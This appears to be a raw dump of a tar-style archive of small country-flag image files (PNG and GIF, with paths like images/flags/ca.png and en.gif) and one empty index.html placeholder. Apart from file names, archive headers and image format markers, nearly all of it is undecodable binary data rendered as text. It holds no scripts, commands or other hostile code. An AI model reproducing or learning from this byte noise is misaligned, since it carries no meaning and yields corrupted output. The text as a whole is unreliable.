��q��t������&A�''���;���������æ��g>�����_�~��&��VbWb�:@,@'1����|����W�|<�F��"������I�����O{�������_������P��?���f ���>������C�L\2�2@u #���� ��!��~1˴ӊ�3|``��0�&��`�`�� �|�^#i���IEND�B`�images/flags/my.png000060400000001073152434416630010245 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd`8)�yaӒ����?���I{���	@���3�g��T]G���[
o��hag������a�˳g1�vn�P��5.�
���JA�p�V�bc�������������ܨ�����xɣ�������w����� 0{��ƃ	Fff���b�f�����wL�J���ϴ6�/I�e+�d��������,#s}��bd`8:e"���v���U�@'�;a�*QN�_`��30m�x�@1�d`��/��������L����o�ߟ9����$����={��󧌼|���e��u,��@�!f�I�#˛�w�垤�h~��@&��2�&pȀ����/=
@����g�u 	�0�,���M�b���ُ'O�0@��f3@� �L�g[�fTIEND�B`�images/flags/sn.png000060400000001024152434416630010234 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bdhd@����@���&��@�TV�Y
R��1�e`�?��0�����̟����"�l�@,`��?������e������������~����_@Ռ��@�49�0s����T�7Z���:�p��Z_XR�+�@�2U���ϟ��~��{���?��P�%�����i����￿����+�~m����R��\��!������/X����m0�e.�ۯ_v@? l`;	 �@~�����/����g�
�C�&�����n<���h0�I����@_�=
b0�P���O���@,�~��#�-	�8X~32I�q� ����N F�d���/z=����O�`�,[����XIEND�B`�images/flags/ps.gif000060400000000316152434416630010222 0ustar00GIF89a��m`�	�tg�
��=8ރ}�&&�iYۉs�{n�{ؐ|�㗖�\]�F6⎁��!�,K�%�Te�W��䉪)k�n�,%Qd�� 	IP�p��c�j$�#Ad��
�P0�j����r�_�;images/flags/il.png000060400000000657152434416630010233 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<AIDATx�b|��%�p�����.@1�����'����*�����d��������������ALL� ���##�k���Yuߒ����/�B�q'@�@\U��a��7��g�/��?o�5���
@�\5X����?�������g+���U������a�ޥ���?w���@� ��=)~ v�\��g��
Y� ��~@��$x� 4@<
@,�.�Z���l 	��?��e� ����r����?��x��m��d �J�)yo�~.IEND�B`�images/flags/dm.png000060400000001154152434416630010220 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd�d@�@��(fU��?�W��D~1@�_�T���$�2��������� �Z\����9+ �������ϟV�X@,��~{���_�PC̕_��)���=͍��$�@=������@L 0������×v�?QVS��~����y�?�~�������1������������B�I/\��Α@X}��q����ש1�|{v���������d+��1\�������	N�� ������߿@=����t�/2���K����d?���)�Ծ(����{�bd�f(�.~���¢�H9�����οv�nt�����!n�&��@(�)j?@L�r~���������r1%�fz���~�4D5P
�����@,@����[�SD@���Zc��π3/����v����PH5#C.JDB�/���>}*"
��$�M�,��8̃IEND�B`�images/flags/ta.gif000060400000001730152434416630010205 0ustar00GIF89a�+++000666888:::===???0O61O74O71P72R75R73P93Q:3Q;4Q94Q:4Q;5R94R:6R;6S=6T=BBBFFFGGGOOOSSSVVV[[[___eeekkklllppprrrssswww������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������,�(@�@��$@paB�H�H��E�9>��إ�ʼn[P@	�Lb$��É�!e��s�K�1Jld)�C�-O8�1��
1�pH�Ɗ$L !F@�2��A
�-6� �C
5��B`�<��PȘ*U�X���*X|ɀ�˗�QJ���L���0�"�(T�p�*@p �A��;images/flags/gs.png000060400000001166152434416630010234 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�b�YY��Y�{�tA�(I�u����ݴ������A�����������(�@���O��2�~�eÇ����B�*U˞|9q�ׯ�~���B�����M�1���b~
�����		��T�=�������������q1�`�?�MR
����(
<,�ͮ����JJ/bb8��洴ѷ�����CL���0�;!ُ�j�Z(G9��������8f����K�����1�2��w�P�������ŒT!3y*���������$Ŵ�TST1�i��o@	�����������m���������8��%�������}p�����I��~�
��{�C"�������^}� �X~�PXP3�$.:�x�i �۷�**�@
��
ȗ����A��/X3��d�����_^ 	�@���f`������f��$)O�IEND�B`�images/flags/ca.png000060400000001164152434416630010204 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�b�����&���p�>̀���$���LX�
�``��@,�=�,/J0~���~}����Y���,��YY,�<����?� �Xx8�f�{��W����2m����J�A�o��)�$%� �X������������+�����ï_O�a����̔�����:	 �X������߿���	��e�L.Fn���.�����ڵ���d`���'P@�0���������Ke����g�a����3fu�����������$�b����?��6�����')雰�ӿ�"$�_^�
T����_ '˿/_���п�

��bd�27g��t�ϟY1�z� �X��}
���@���4�����Ԅ������(���l?���:	 �X������($��;#8�q�.$d�c``bb
�**1����@����Q�����ʕ?~�#����#GG6�2 0�2�1x��IEND�B`�images/flags/pt_br.gif000060400000001571152434416630010712 0ustar00GIF87ap,�3f���++3+f+�+�+�UU3UfU�U�U���3�f��������3�f��������3�fՙ�����3�f������3333f3�3�3�3+3+33+f3+�3+�3+�3U3U33Uf3U�3U�3U�3�3�33�f3��3��3��3�3�33�f3��3��3��3�3�33�f3ՙ3��3�3�3�33�f3��3��3��ff3fff�f�f�f+f+3f+ff+�f+�f+�fUfU3fUffU�fU�fU�f�f�3f�ff��f��f��f�f�3f�ff��f��f��f�f�3f�ffՙf��f�f�f�3f�ff��f��f����3�f���̙��+�+3�+f�+��+̙+��U�U3�Uf�U��U̙U�����3��f�����̙������3��f�����̙������3��f�ՙ��̙�����3��f�����̙����3�f�������+�+3�+f�+��+��+��U�U3�Uf�U��U��U�̀̀3̀f̀�̀�̀�̪̪3̪f̪�̪�̪�����3��f�ՙ�������3�f��������3�f������+�+3�+f�+��+�+��U�U3�Uf�U��U�U�����3��f������������3��f������������3��f�ՙ��������3��f��������^%H��A��ap� 3{��5Ȁ��1
���f"�I;jd�hÁ� �+�`%MT#�Ieƛkd���M�'ZL�qǓF�X0�B�P	;images/flags/mp.png000060400000001125152434416630010232 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd�md��~��`Ə_?�0�����/ ��	U�@���1���m,����/��O�{����������I�6���w_���/)�KG���>�dd�U~��u��Ϙ~��+!�� �����?P�����H���Gm�m�l
���}���������/P@11����?H5�I����㊭����0H��n�M%N�G������?���	��6�Z����Um^!~6c1?'�S��YY�����P���@�m��Ѐϟ��e�\~�����W�>8��������A�Cm `�m�����L��1~ox���"��R�v2%��9	�? o��t�S�9^>qn����4}~���S�4� �_��Ƌr��%G���~�����٢���7Y�� �tP�?�bd`ND�H0��DB�`0�@ྭIEND�B`�images/flags/tl.png000060400000001002152434416630010227 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�L�A
�]=�3=\�$I�fM�Np����:�J!s#���5^���1|����?@��?������$�˦M��p�¿��O�c�������/��
�$����f����@ 
���?����/������aJA�C40��
�@L@
������G����������g��	6���b�i���knn8s�y��I��_���`��?�6H��m[<xPZZ���+8��=}������'\�I�éS��-[nh����7��?�g���f6���`�1H�ϟ?-��fo���OduP��P�H����(q)����0ȀB�l$���!�$�bte`X����D`+IZ}+X9IEND�B`�images/flags/co.png000060400000000743152434416630010224 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<uIDATx�b|����?(�b����@,@	!�j��@� ����/P������������۲	 �X�&�O�J���@z@*~��_`�]h	@������ȼ`�������� �X���e`������l0��d0�50�0#������/������!����H��a���(�~h�I�ba���������~C�����d0����o����f�����k1 \����~�� �X����������M��($�\�>��@���)+�g8@,l�~0I���D����
a
����������@�w����� ��DC@`��k�/|��IEND�B`�images/flags/py.png000060400000000731152434416630010250 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<kIDATx�b�π�P�X@�����_����upɒ�2�ҒKF6h�U
�wg���@� տCH(�$����f���@,_��gcc����?C����������b��������G�~nY��o6� 99���o~�ħpCA�˧����8����?2``���@1�[��5���W�X������� Ʒ�s���i�s>�i���!3ӓ�/��A�bs��㗿����&��I8�����/'��f�i��A
 ������4��9�P���{��AzK8� (UX���_120�F8�I�R�����S�]���IEND�B`�images/flags/tk.png000060400000001176152434416630010242 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�bd�>��
��c����&y���?0�1��{�!�����4'�0$�������%��+��
����������dÓ����iϓ�����W�����#����X���>Y)v������������oEϝ��)#X�������#�������6��t@11������?�~{��U���|��@�wyp���+�e���������_��Nj�@@}���?�c�v���K�����~������S��ad�%'����@e@���������� �e�{ֺg�~�fx�����o��xG���@#�������\�+��z��7V_�=�J'�����(��U�����'P1@�l�
�ǯ����	�x����ع�?��������?�w
�����P����_�.���{���0��~����J��;ayI^�����@120�F�K�/π�1000��e��@��[%����tIEND�B`�images/flags/ni.png000060400000000774152434416630010235 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd(���
��c��C�@�*b` ������g��������2����/�����@��5M_�d��������J3�������� �?#÷�bj *�_�hPD����ߟ���z 6IQ.�����/�nFF������������ӿ�Y�8�sg����O�>ķP1����j������d
������Q��_Y��(�����@1�O�]h����������������	E���e�al[� �X.�wZ���;`80�B&�P�2@lH��B�AE��a%@���o&	~�(���o`$��1���h����?�x�@��_��"(��=v!Q����� �/1b��l�IEND�B`�images/flags/ch.png000060400000000557152434416630010220 0ustar00�PNG


IHDR&��qgAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�b�π�P�@, ^u5����###��7Ï��0���g�l��`����S��-��d��:II���$��/T~����7���@��hYe������@�����ׯ�@��� ���02��0q/@�m��,��*�~�  f��e���֭PIss�See��R���@���_@q)@�T0���HQ|���?���ڀ��)����&��Ǐ����IEND�B`�images/flags/sg.png000060400000000724152434416630010233 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<fIDATx�b|������ׯ?��s�$�  K��)f�_��|�I[��ǏN����1������?�|�i@�51kk�>~�Ϟ=,?,`��c����Hݯ�������,+� �@����,/���;vp
�VWT��7P�/���@�@ '�>x��ښ�������~�1��HU3����� �X�V��r����xx��3qq���	�l0ß?���0JJ���xx��LLLo�� ���|�gp�,������?f0���� �@�`������!�	@,���x���B4���`��OV�Y}IEND�B`�images/flags/ie.png000060400000000741152434416630010216 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<sIDATx�bd����10�ax�򔉁	ă�??D�T��c���8���C�k5T��⌌@
��(��ߟ�1���1�����	 �XX@�O�>���/|�󅗕�?|���������QX��b�h2P� ���?&����_@K��j ��������?�P���_��HP1@�=
4�����b���?�����l����z0,�r�I�`'H�o��A���(t=@'1����;	��7a����A�� �X�����InI�7��eE###0�0�)����$�bd(e`��cP|�`�^�]�K
�@�7d����J�r��IEND�B`�images/flags/th.gif000060400000000106152434416630010210 0ustar00GIF89a��3f���!�,�������4؋�޼��Q�(2�i;images/flags/mw.png000060400000001021152434416630010234 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd���&3`�c"�a�>j�N�� �!�L���gd�l����_s `K~I0U�@,`m��<y���_׿u~����o���������߿n�i���* & �_��_����^��oԯ_�����ס�?�~�#!�)(��a�Rꚑ2L�;C}�c�))���C�+ہ6�_{R����+��N���j`�����o6�4A@�
	�i��b<а?`�@H�a$���ba�f�����ï?����H�� � �/���Ŀ��l��@,RϹ�<I�Я�~�Ձ�@.T��?��2�0��C�HrH������_���*���A��倊���������`����Lr1��]�.�քIEND�B`�images/flags/ml.png000060400000000732152434416630010231 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<lIDATx�bd����10�ax\� ���3��A2p@,_�]��*����O��/�ad����I����?����D~ٴ	 �XX���?���￿ ��7���Cѯ�o����P5��,��baY�����
d����?`
�������7P@������ �0��b�bzh�￿���k������(�@ 
�f����I�D���$�i������ տ����fÿ�pの��@`'���� �jd��5}
n�b���$�%A���ߌ h�o�?J@J��$�bd(e`���B�{x`�D���B�c4r2��ZIEND�B`�images/flags/nr.png000060400000001017152434416630010235 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd��g����1���������$�	��P��#���������x��?�׵W��������b�R��?�4���Hʈ�� �@S���2���/0���?�j0	d���@,\���03����?Ю� ׀��ā ޟ��^�@,�gҰ���՟���`d����0�����7����!qS�/@�(��K>~�a�#{���O_���ϯ� 7]��ϟ�`W)H
��@L@��g���lӞ��������������������/p�0�~]z��ӗo?�}��Ǐ��a�4��`O���� �&�9���w	a�?�0�S
f@��i FK���(���-r�9�IEND�B`�images/flags/ga.png000060400000000751152434416630010211 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<{IDATx�bdhf@�`$��!0 ��RA�7DUFjo��;͚�v�9�ђɐ�}M}�
 �y��?����￿����� ��~�����/ C�G��@� �am����Tv�)�fT�ooZ<�|�?N�+�X��002������������/0�0~32��d�@,`���k�
S�I5������?�i*!����C!��j F��r���
���������l��?i�9���������2�����@0h��`��?�N)�ba�4����?L`S�C�����x90�~#��z�o�~�������3<��A�`�#h_�p�lIEND�B`�images/flags/cs.png000060400000000667152434416630010235 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IIDATx�bd`���
�10������d�����@,�1U&a��FwOx$�r��3�{��IK&_�m@U� �y��<�T
T��7�����������￿~E����20| SSMM!QQ������l<��N0�DE9�o� ƿ/_2����0�?ݸ@,�B������h@��<�k>І��P�@,������~� z̀	�dED�tv˿�י���0����/�0�"~3��ˠ�t3@���II�H(��7#���B��� �b�b�
�b@�I@�s�g�_IEND�B`�images/flags/pe.png000060400000000615152434416630010225 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�b�π����s� �(*�KA@��VW����1�������f�����������?@�˦M������rdp���_���ee�6��Pտ���j��߿������6�����L��h@����/ĕ4��4 ��N���_�50��@`'����*�V
`う�a` �fp��rV
�@�t@�40��� )	6�/$ѩ�	C * ƯH������"��B�� �=a�;n�'IEND�B`�images/flags/tw.png000060400000000721152434416630010251 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<cIDATx�bdP����Я?�<|.���PYK��4fgfb:�������P���+������#�l�@,�E��sgee|0���7�����ރ�?������_���f���@,@k������_�����������7DP�� �X�������5s����ǟ���
4�l��[���Pٿ��>�h���2�A��h�20�ߧ���?x4��7�H�@&�N  f
@Q��$t@�40����S������� �@�~�a����H'#�H	D�BP1@1~E�Hl���ISf�捧�IEND�B`�images/flags/nu.png000060400000001074152434416630010243 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b,.���2����W݉�"�Y?~��t'�I��K�9���A���_�by�%u'�����g�b����7��?_>���z�?f�e��LL��*��c�����1��!�3%�
�����2���2ɚ
F���������������08�(�0S��t�����ګ�'$����“H�Mc�i�Sm9,�3l��S�μ��7�X�0h|:e��p�k�HP�|�ן����?����@����5�^����'sq���{����ϼ����
1�������hNy��V
*:���y��LV�O~��1p�G�� U�� ����.c�	ATCCh-$DA$� @@@���30������'+�I@e`w�X��h��g?@F���h�c����	H�x�|!�IEND�B`�images/flags/gf.png000060400000001041152434416630010207 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b,�z���������ߟ?�?�022*������'���b���������¦$��A�@�? �������~����mE@�40�g���߿ _�~�@6�x�=|Ϟ�����"@K�89�0K����t�&�8�@��[z��M"-����b봗�b���P�߿@��*)�q�m@�@�����/��A0�0���q�;���^7��Lh�3�����
|�Tt��@�P�?zD�����_���6ˏ_@������A]T
a�U��V�����j�=�I,�$��߿���@�|z��?.Nf ��&H�@���%��1��d@�|���m��?~}���ˏ_Ҝ�@������Ǐz���A��{f�uDIEND�B`�images/flags/mk.png000060400000001230152434416630010222 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<*IDATx�<�	�0���T��K�"RD�xi�D���{y���br2}�1�x�{r������������f���������_��(��N������A�ӧQ����7H���Y~���?P��������8O��a�1�����#��@������������H��*��������1��5�������+��2��5��������������(�����Ў���������?�ρ
����������ݯ�J���f�� �Xl�'��������|�����@
��?����ͨ���$�b�w�����d���������
�a߯�>������7�W��a` �?����O�͠��w�������Y�_��A�`8��a30���/S��ǒ���fx��A�7��ߌj���0(�n�ah��P�����?Y�b����_ÿ�@���L���?k� T����@��D�V�;0IEND�B`�images/flags/it.gif000060400000000122152434416630010207 0ustar00GIF89a��F����#,!�,#���}�RsD9E�7�z��`���F�S��+�kS;images/flags/pk.png000060400000001071152434416630010230 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b���#|��Ez�4����f��1X�����H�1��������߿��������������ߛfl ������㯏?��������e�����_�����Z�Gh@1ATC�?��U���+[;�F����,�,�����@A�������5%�$���v<���OnM!�������6�%�(����̜Ͼ<�����W��ϴ?����_��j &���0��x��%0���~�������O?����
����?$
 ��x��@��G��}V�U�pgÞ'{�A�@,�N���7�@K�O�=���Aʁ��g�7���ǟ��N � ����(�-����?�Mw7���h?�dfeVP���/��b|���?0���j�*��F�x.���@���n�IEND�B`�images/flags/gh.png000060400000000752152434416630010221 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<|IDATx�b�π�P�X@�����_����upɒ�2�ҒKF6h�U
�wg���@� տCH(�$����f���@,`����J̓(��
��7P@
���`
>7�:�BS�x�+���)%�����=Z
��FL<q�_������ڴ�����JN���h��#@1�}2�?D�WD�/9�_��?㣁ܟ0
���j �2����?�����￿~����߯ߎ���m�����De����md �?��}�"
R��7�
�j�D�����#�-	6���N��? �/0������5�c F�d��= �� ���!pB0�br�(�IEND�B`�images/flags/sv.gif000060400000000105152434416630010224 0ustar00GIF89a���[�!�,�
p˛
ϋpRfcڼ�*�x�%F�Av�M;images/flags/cz.png000060400000000734152434416630010237 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<nIDATx�bd�?� ��&�������8���@�����+{��_E������B/^� & �g��/G����+C3b!@����s�������@4���������纋����-�Kß?����o�����?�ߟ+�߾ZI�
����d�����Q@�!/ ��6
	�������s~����ׯ��A�߿��I%�?��?@���5؝�hwn#T����~1��I�k@�� �X~���>��<H5�<�6������:�����ӷ����rL@�J����H������ba���Z�q���P#Ph�� �c0103y�JIEND�B`�images/flags/cy.gif000060400000001757152434416630010225 0ustar00GIF89a�~��t�z�|������"b���^0�fg�1�2z?X�)l@�FP,[�����;X1�'�$$#g잞�����&(_Z?���gg����l�s��??MQ�88���
�'����⛛4T�|8�������{3��������GQﭭ�__ꥥo4���@�SS���.�2�2�^DjB�tt���t;OI����1W�	蓓����c����tt�%%s}z�!!�������YYvᕕ�1�1�����^B�GLu��NN���$�볳�55��!RL�������q?�hﶶ�#)�����*�8;��Mt)�#�y���!�,�#	H���+;�h� �O�-fEB 0F�\tx��#0.�D*�B������ˣ���� DBѡ�N5�)Á�H	)t�D�:?�h �Ɗ!H!4��ϟL��@g$�4F��0@`��,+FD0$6�!aJ���xRH�Xb���>�r`2cC��n$��
	(Tt1����c˞;images/flags/me.png000060400000000700152434416630010215 0ustar00�PNG


IHDR䅪�tEXtSoftwareAdobe ImageReadyq�e<bIDATx�TR�/CQ?���#mc�.!$"t�b�` ����`4u`�"Hl���� �0T"�b ��T{�9ι���y9y�|�~��E������T'fbD�9"�l����}A��c�J	{���́կ��m��ԛ�c=W��V Ź��,�[�ac0q�9�H�`;/f{����J��e�;璐b�,p��#�h~�x�#��i;�.F����
	�饟��U�&�o�ap���ӓ����C`A��=~��.'.�*w�|�����*��#�P_�tZ락���'ύ���
jK��s�m�/_��|h��_2C�g�ϐ�W
ı��ýF�4����Xڒ�I9M�jR�A�)��8=B�O�Aj
I�~�IEND�B`�images/flags/za.png000060400000001202152434416630010224 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�b`hfh��_~������ �7�O��_>30|d`x�� �3�b����t�����#,G�1������?��1��M�����Y���3_>|y���r�D�o_X�����Hݯ�������(+��� 1��~!'��
����s1h$���������������	
�����LGㅃ-���O�������f������A 7��o�4 �X�����q������w��x���ǟo�?������������
���'��i������������d����������������x�Dx��ߝQC���&���,�~}�lS����.��/������x�Yd���e~3��K�I�7_�0��.6Iؽ�u��/^?�@+�HE����]��ϋ��"7���h����y�g�}��c�����0��H]� �2��f��������/�`��F`�
 ��B._��CIEND�B`�images/flags/sr.png000060400000001001152434416630010233 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd�g`���`��/0��
$YP(�F�0�p4��I\"�=�
fk���J7܁*1$���ŠO1�������?0� �0�,��$#��w��$����9�߿@C��"��������?Ц߿���
d0JI}\� �X�f|��S�:��@*�~�������g�k�@��	��?A�԰���_�e~���!�;�i��߿@��n������O�O��߿��$^���`����7L����o���(�M����k^6���`���?�@4,����?3#�W����!�;�?pH�B���й �`����B�y�bd(f`���_H���pH��0�ih�IEND�B`�images/flags/is.gif000060400000000124152434416630010210 0ustar00GIF89a�����3�!�,%�p�֛H1�⥠w녞B�扦K�a�a�%�t
�T;images/flags/pl.png000060400000000566152434416630010241 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�b���#������?l �X@
������������3300�G_�= ���Ȍ��##�?��H�)����VF�j0ģ� �X�����?{����?��������� Yi��I����_�!�~������_ 6���9vXd<�"T��00H3�pE��5�e����i`���ARl�_�? ��`# $��A@���pĀ�E���\�Ǵ]�IEND�B`�images/flags/bf.png000060400000000761152434416630010212 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b�π�P�X@�����_����upɒ�2�ҒKF6h�U
�wg���@� տCH(�$����f���@,`����JCL�����7P@�1#P5Pş?����~�������	�4 �X�10�r���q�@�_��@����b����ׯ� {X��\b` �Z�|�?>����ן�~u\�5��������(��7�T�}�	@
��B.�c��^�=V��B�zE�҈�R�f�
a,�l��@,@�ԁ����L��j�D�����#�-	6���N�
��f��/�����@12�3�@�T�$�p<31S�h��B�IEND�B`�images/flags/index.html000060400000000037152434416630011106 0ustar00<!DOCTYPE html><title></title>
images/flags/ly.png000060400000000643152434416630010246 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<5IDATx�bd�ɀ�00���ؿ$@��b`BW��Z\�}`f6��{jW&ɱ"�4��E}�
 ������x���_�j�
�"�$��2�9��6H��!� �T���/�����*�b9��/�
�PE Ư_06H���@�l�o��`JAF�
i��m �����@�W
q�f����j ��?��������,P�9���ӑ����@6(���(!�!�(@V�*�
��`
����%"�$����r�(����IEND�B`�images/flags/ax.png000060400000001227152434416630010231 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<)IDATx�bT����?��.%��<�7�M`ɔ��~�b������/��� �����3����C����-�6{G����̿�����߯���?���� 1��������������������������������P8)�0S�ߺ�V�,��!H��F�:c�S�v�E��p�/��VfV�����_������_n�;~�����_0���߿?�9��Z@,,��d|��������ߌ�~2�����'#Pۏ�?2��� �IJ� 1���*��������^����������������k֔�T�o�����j���9"wd������@�/���ʋr�Y��!z�� 
���w�\7�
�X�:B�,~[q�[!�S��Ȃr�@,>���Y~�a`bf���!!������?������0������ ���3�������ʅ���3(OL�<�#6�qL-���AIEND�B`�images/flags/hk.png000060400000001017152434416630010220 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b|��
��Hd�,��fb`  ������ �������0�����o��N>޴	 �X�@j��{���(��/���n�Ok�����_@�L��@�V��?T�߿L@��?9鿺:��0#ÿ_� ���b�����?9kj��������̓&q?�5+�ח/��A@�j����7�;9�ߴ�?'������7��`o5��� ����q�4^���(�8?�[���g��N &PPu���Mb����<�����d<���6��?�+�|�XQ����_�?�9���c��?������/P1@�����?���L c�����YT�YP�˫W,rr ����
P1@1>d`���Ȍ?�q��`�=歆b�IEND�B`�images/flags/be.gif000060400000001130152434416630010161 0ustar00GIF89a��Ӏ�������᫫�Ќ����ь��������†��*?����{{���Ǜ��ĕ�Ц�э���ψ���q��c��3D̀�ȧ��uu�CC����^_�h��Ȫ��		ਨǞ��{{���?H�{�ǔ���ˢ�ƅ�����nk��̰�ᆪ�������

ҍ�ƞ���������ň��99��ś�Ԧ��ʭ��ʊ��ᨨ�FP�z��ό�Ԁ���૫�����""�!�,��5"C#
c��
M+.Y2a7g���^-P,`X9d���dTL!<S;l���W6=*Bj�j�j�4N)\k���?83&i���kE_H h���0$>V:
f���1
]'/G(��!P� ��(�C"OĴI ��E1�D(�E�)����H ;images/flags/catalonia.png000060400000000616152434416630011555 0ustar00�PNG


IHDR���ntEXtSoftwareAdobe ImageReadyq�e<0IDATx�T�MKA��U���U�ŏ���P�ԛ��T���x��AUۃ+�
Kw233;���K�L����Ƙ�j��,TbU��9u�
�f���(f�Lj��W��'���Y�BHZYer�$3�L�+�L�t؂��<�e&j�f��`���nc�
�4����M�C�:{|���N���������p��;��v�uD���c���4����fa�l��7�c���U���[�8�a��6�WH��\�H��}G�q`������m���%�S�����!�u�O�y�'�x�d�kv�IEND�B`�images/flags/ba.png000060400000001121152434416630010174 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd`8��.��O��.fQ��/���������$�������	1�VI�����ƷE1��������������Sm*�����������>^��3��mŮwaf��20�����~�������l@K�	h˿��0���m��.�K���������O�j ������@� ������Ts���?8�G�?��ϟ�~AT�������T�����q���٫߻z'������@?5�����_�	@
��l?��_��C��N]���?e��`��?��6� �������ߟ���?�u¢w>A��["�����`���`�@s�$�>��{�ۀ�
�@��h:@��l��_R�h�b2@���{�{�Ə�Y3��ȱ���@�;@��� ��Tj/������`@����IEND�B`�images/flags/kr.png000060400000001120152434416630010225 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b���+��������1@1��8���كGW�_d����-�����-�����|����w���	5��ׯ_oݺ��"bbʊ��������g/^�]�F@PPXHHFVh@�l�����~��mhb�,%����A�����u�
b�n^^o޼y��P��b������իW\���{pL�����/�~��%��)"���7R�R����= �/��EDD���o���0�f�l2������9}vvni)�FF����޾}���U]7W������؇?�������GIIIF����	���o޼9m�4��=8U-T�01|�����$�o�����'OB�@,�������<tXSK�6L�	����u��ݻ�z�zaaa���� KZZ����˗bb�@�zJ\w��Kyxx5����� ���}��p����a��V
��17/��$IEND�B`�images/flags/en.gif000060400000002013152434416630010176 0ustar00GIF89a��-璘菚%q�.B�-Bڿ��+�*풛�8H뜦}��,x K�)v�,$r�+���-�ꗡ�3E�ּ����F����6}� �64|���(�*����.����)�-U�w�4H铝����#8����e��Ua�T`����j}`r����'t텎�|�y�`p���ݼ�)t���`��Vb�����Ra���pw�����dr�pm�l����$wh��x�p`���i�n�����럩����0D�**w�9L�8L�1E#s/��i|� N����� *o����پ�)R�茗�WcTb��d�9���)>h�<Z�j������!-���Qp莙 }����rx������뫵��Ǯ��8^�̻�z"K�鐚���x�4Fc��'s���Vcꖠ�4G4z�Tafu�+Y�맰1��y�蒝~�õb�������*v�������쥮u���쌖�,���ߥ��GXp��������!�,�p(󠁖=�l
#�FO^��R���R�J+�D),)��D��ȃ�c"&���a�)D.����X��Y��ħ9�2\a�'��XA⢆�=�X(P�e����
XP���X�����V,�� ';���h�#@�Ȓe�NB%k�����j�*Ȍ(0p$5�F'37Z�9�C:Nl���8I@�2�DL�>@"#d���DZT% ;images/flags/ec.png000060400000000764152434416630010215 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b�yS���'����������@A�0PD@�0�{�,�V�����@���!�������@�?nt�g���$B��J�$����#�8�z��r
V� u �������n �O��?���;��� ��,�8��E���-��/����������? �������I�L�}@,�oI=����
�o�4��������?L���\J�����$����Ư?��@�����_P�y���_�������P��/ 	6$��eUR:{� @�(00p|�� �
R�b���YT���/ou��!�Pl��?H$@��l�#K���IEND�B`�images/flags/bo.png000060400000000764152434416630010226 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b�/�����e��~0���1@���`8ގ(o�KlhF[l�܉�B)Ѐ��p����
 ����߼*���*��?H����(&� �X�E�eS��O�?�������X���`������<@�|Ib�����0����?P�o�]0�o���Xy?�0�# �A�@����PE�1�3��������?�o�j�f�l�%`�����@,k�0����?�
 ��f��@��a�1�@��~b�����O����������(\ �� �W����O���($�"
?�I���b�� H���|����a#8� !�,n!�P ��#|�9F�IEND�B`�images/flags/ar.gif000060400000001761152434416630010207 0ustar00GIF89a����������W�L�Y�MC�k�]���up�e��v�����	R��e�E������d�Ve�Xa�WH���~��vZ�Nd�X��w�s�����vR�Ep�kb�WX�+������do�D4�Y�Nk�K
���h~�h���p�O������x�qg�Lq�ev�k��br�gi�G|�v��}T�':�+#�G�75�'x�s1�"q�f��������кW�K|�Y�Ѱ��u?�5v�o,���[�1^�2h�\�Ь��a�U^�S�j�@T�%R�%/�!a�?��ğx�l]�Q������v�n8�7�*���V�Kj�]������K�L���x���~�g���Y�LO�E.�V�L"�3����z�v��i�J���k�]���Q�"�
